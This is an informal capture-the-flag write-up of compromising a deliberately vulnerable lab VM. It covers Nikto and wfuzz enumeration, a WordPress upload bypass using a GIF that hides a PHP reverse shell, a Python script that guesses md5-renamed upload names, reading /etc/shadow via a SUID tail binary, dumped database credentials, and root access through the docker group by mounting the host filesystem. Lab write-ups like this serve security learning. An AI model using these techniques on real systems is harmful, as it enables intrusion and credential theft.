running sparta gave me port 22 and 8000, on 8000 i found a defunct wordpress. which pointed to localhost, that could be fixed with locally assigning localhost to the vm’s network ip.
i also found that Handsome_Container was a valid wordpress username. i started bruteforcing it with burp suite.
nikto revealed some interesting infos:
– Nikto v2.1.6
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 8000
+ Start Time: 2019-05-01 14:55:20 (GMT2)
+ Server: Apache/2.4.25 (Debian)
+ Retrieved x-powered-by header: PHP/7.2.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.101:8000/
+ No CGI Directories found (use ‚-C all‘ to force check all possible dirs)
+ Entry ‚/upload.php‘ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ „robots.txt“ contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header ‚link‘ found, with contents: ; rel=“https://api.w.org/“
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
+ 1 host(s) tested
the /upload.php is interesting, its an image upload function. i started uploading with php reverse shells infected png images. That didnt work out.
Warning: getimagesize(): PNG file corrupted by ASCII conversion in /var/www/html/upload.php on line 25
At some point i found the hint hidden in the html code <– https://github.com/fatihhcelik/Vulnerable-Machine—Hint –>
That revealed the upload.php’s code:
That makes it a lot easier. We can see that the file ist renamed to the md5 of the filename and a random number from 1-100.
The script checks the mime type of the uploaded file but no extension, allowed are gif and png mime types.
So i created a random png image with gimp and opened it with hex editor, put a a php reverse shell in it. upload wont work -.- after learning and experimenting i found a gif working like that:
now we get to launch the shell and for that we need to find the uploaded file, so i wrote a script to create the 100 possible hashes of cmd.phpXXX
#!/usr/bin/python3 import hashlib textToEncode = input() bisHundert = 1 toEncode = textToEncode+str(bisHundert) while bisHundert<=100: print(hashlib.md5(toEncode.encode('utf-8')).hexdigest()) bisHundert += 1 toEncode = textToEncode+str(bisHundert)
$ python3 md5hackinOS_ctf.py > cmdphphashes.txt
thomsane@anansi:~/python$ cat cmdphphashes.txt
now we can supply wfuzz with the payloads stored in the textfile.
$ sudo wfuzz -w python/cmdphphashes.txt –hc 404 http://192.168.56.101:8000/uploads/FUZZ.php
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.
* Wfuzz 2.3.4 – The Web Fuzzer *
Total requests: 100
ID Response Lines Word Chars Payload
000024: C=200 3 L 16 W 165 Ch „39b07a3be178f1249b64f60105360c4b“
Total time: 0.245449
Processed Requests: 100
Filtered Requests: 99
and it found our „picture“ at
and my listener received the shell :) which i upgraded to a real tty with python -c ‚import pty; pty.spawn(„/bin/bash“)‘ and started looking for priv esc possibilities.
i found /usr/bin/tail to have SUID bit set and tried to:
$ tail -n 100 /root/flag
Life consists of details..
well, thats not a flag right? but no permission error either since cat: /root/flag: Permission denied
tail -c1G /etc/shadow
enumerating further i found $ cat /etc/init.d/delete.sh
while [ 1 ]
rm -rf /var/www/html/uploads/*.php
okay…that was the fuck keeping burp suite intruder from finding the file because of the speed throtteling in the free edition. -.-
LOCK TABLES `host_ssh_cred` WRITE;
/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS */;
INSERT INTO `host_ssh_cred` VALUES (‚hummingbirdscyber‘,’e10adc3949ba59abbe56e057f20f883e‘);
/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,’Handsome_Container‘,’$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0′,’handsome_container‘,’email@example.com‘,“,’2019-02-23 15:49:54′,“,0,’Handsome_Container‘);
e10adc3949ba59abbe56e057f20f883e md5 of 123456
well, well, well…i was on a container before! i noticed when i looked in /var/www/html and only found an index.html. i was thinking so when i was looking on the mounts on the container…
[+] Current User
[+] Current User ID
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)
ok, we are in the docker group…so basically root already.
lets look what containers run
hummingbirdscyber@vulnvm:~$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 252fa8cb1646 ubuntu "/bin/bash" 2 months ago Up 2 days brave_edison 1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 2 months ago Up 2 days 0.0.0.0:8000->80/tcp experimental_wordpress_1 81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 2 months ago Up 2 days 3306/tcp, 33060/tcp experimental_db_1
since i run the vulnerable vm without internet access for security reasons, i used the ubuntu image which already exists to elevate my privileges
hummingbirdscyber@vulnvm:~$ docker run -v /:/hostOS -i -t ubuntu
now we run a a new container and the / filesystem of the main host is mounted to /hostOS
root@c50ed36b8d25:/hostOS/root# cat flag
Congratulations! -ys- /mms. +NMd+` `/so/hMMNy- `+mMMMMMMd/ ./oso/- `/yNMMMMMMMMNo` .` +- .oyhMMMMMMMMMMN/. o. `:+osysyhddhs` `o` .:oyyhshMMMh. .: `-//:. `:sshdh: ` -so:. .yy. :odh +o--d` /+. .d` -/` `y` `:` `/ `. `
that was fun :) <3